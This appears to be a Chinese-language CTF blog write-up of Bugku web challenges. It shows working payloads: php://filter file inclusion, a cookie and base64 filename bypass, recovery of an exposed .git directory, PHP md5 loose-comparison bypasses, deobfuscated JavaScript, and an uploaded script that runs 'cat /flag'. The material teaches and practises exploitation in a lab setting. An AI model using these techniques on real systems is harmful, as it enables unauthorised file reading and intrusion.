web0 | Alleysira's blog

BP-basic

Bugku-好像需要密码

python脚本+bp爆破即可

php代码审计

Bugku-文件包含

点击之后发现url中有引入文件的操作，可能有文件包含漏洞

1 2	http://114.67.246.176:11573/index.php?file=php://filter/read=convert.base64-encode/resource=index.php // flag在注释中，需要加密后再解密读出

Bugku-cookies

查看url，发现fliename经过base64编码。解码后为 keys.txt

尝试用index.php的base64编码，读取index.php

import base64
import requests
url = "http://114.67.246.176:14608"
fn = base64.b64encode('index.php'.encode('utf-8'))
para = {'line':'','filename':fn}
output = ""
for i in range(100):
    para['line']=str(i)
    output += requests.get(url,para).text
print(output)

<?php
error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array(
'0' =>'keys.txt',
'1' =>'index.php',
);
 
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
$file_list[2]='keys.php';
}
 
if(in_array($file, $file_list)){
$fa = file($file);
echo $fa[$line];
}
?>

阅读代码，需要 filename = ‘keys.php’，cookie满足条件才能输出key

GET /index.php?line=&filename=a2V5cy5waHA= HTTP/1.1
Host: 114.67.246.176:14608
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: margin=margin
Connection: close

git

Bugku-source

dirsearch发现.git文件

下载所有文件

1	wget -r http://114.67.246.176:13725/.git/

sheren@ubuntu:~/114.67.246.176:13725$ git reflog
d256328 (HEAD -> master) HEAD@{0}: reset: moving to d25632
13ce8d0 HEAD@{1}: commit: flag is here?
fdce35e HEAD@{2}: reset: moving to fdce35e
e0b8e8e HEAD@{3}: reset: moving to e0b8e
40c6d51 HEAD@{4}: commit: flag is here?
fdce35e HEAD@{5}: commit: flag is here?
d256328 (HEAD -> master) HEAD@{6}: commit: flag is here?
e0b8e8e HEAD@{7}: commit (initial): this is index.html

依次对版本git show 即可

1	sheren@ubuntu:~/114.67.246.176:13725$ git show 40c6d51

Bugku-备份是个好习惯

dirsearch发现 /index.php.bak

include_once "flag.php";
ini_set("display_errors", 0);
$str = strstr($_SERVER['REQUEST_URI'], '?'); // 返回'?'后剩余的字符串
$str = substr($str,1); // 去掉'?'
$str = str_replace('key','',$str); // 替换 ‘key’
parse_str($str); // 把字符串解析到变量中，即给key1，key2赋值
echo md5($key1);
echo md5($key2);
if(md5($key1) == md5($key2) && $key1 !== $key2){ // "=="存在漏洞 md5不能计算数组或者构造两个md5值等于0e即可
    echo $flag."取得flag";
}
?>
    
// http://114.67.246.176:11868/?kkeyey1[]=[1]&kkeyey2[]=[2]
// http://114.67.246.176:11868/?kkeyey1=QNKCDZO&kkeyey2=240610708 碰撞

JavaScript

Bugku-源代码

<script>
var p1 = '%66%75%6e%63%74%69%6f%6e%20%63%68%65%63%6b%53%75%62%6d%69%74%28%29%7b%76%61%72%20%61%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%70%61%73%73%77%6f%72%64%22%29%3b%69%66%28%22%75%6e%64%65%66%69%6e%65%64%22%21%3d%74%79%70%65%6f%66%20%61%29%7b%69%66%28%22%36%37%64%37%30%39%62%32%62';
var p2 = '%61%61%36%34%38%63%66%36%65%38%37%61%37%31%31%34%66%31%22%3d%3d%61%2e%76%61%6c%75%65%29%72%65%74%75%72%6e%21%30%3b%61%6c%65%72%74%28%22%45%72%72%6f%72%22%29%3b%61%2e%66%6f%63%75%73%28%29%3b%72%65%74%75%72%6e%21%31%7d%7d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%6c%65%76%65%6c%51%75%65%73%74%22%29%2e%6f%6e%73%75%62%6d%69%74%3d%63%68%65%63%6b%53%75%62%6d%69%74%3b';
eval(unescape(p1) + unescape('%35%34%61%61%32' + p2));
</script>

unescape 是js用于解码函数，使用 document.write 输出即可得到源代码

## 解码脚本
<script>
var p1 = '%66%75%6e%63%74%69%6f%6e%20%63%68%65%63%6b%53%75%62%6d%69%74%28%29%7b%76%61%72%20%61%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%70%61%73%73%77%6f%72%64%22%29%3b%69%66%28%22%75%6e%64%65%66%69%6e%65%64%22%21%3d%74%79%70%65%6f%66%20%61%29%7b%69%66%28%22%36%37%64%37%30%39%62%32%62';
var p2 = '%61%61%36%34%38%63%66%36%65%38%37%61%37%31%31%34%66%31%22%3d%3d%61%2e%76%61%6c%75%65%29%72%65%74%75%72%6e%21%30%3b%61%6c%65%72%74%28%22%45%72%72%6f%72%22%29%3b%61%2e%66%6f%63%75%73%28%29%3b%72%65%74%75%72%6e%21%31%7d%7d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%6c%65%76%65%6c%51%75%65%73%74%22%29%2e%6f%6e%73%75%62%6d%69%74%3d%63%68%65%63%6b%53%75%62%6d%69%74%3b';
document.write((unescape(p1))) ;
document.write((unescape('%35%34%61%61%32' + p2)));
</script>

// 源代码
function checkSubmit(){
var a=document.getElementById("password");
if("undefined"!=typeof a){if("67d709b2b54aa2aa648cf6e87a7114f1"==a.value) # 提交 67d709b2b54aa2aa648cf6e87a7114f1 即可
return!0;
alert("Error");
a.focus();
return!1}}
document.getElementById("levelQuest").onsubmit=checkSubmit;

Python

Bugku-Flask_FileUpload

查看源代码，将.py后缀修改为.jpg上传即可，在F12中读到flag

import os
os.system('cat /flag')

with open("app.py","r")as f:
    print(f.read())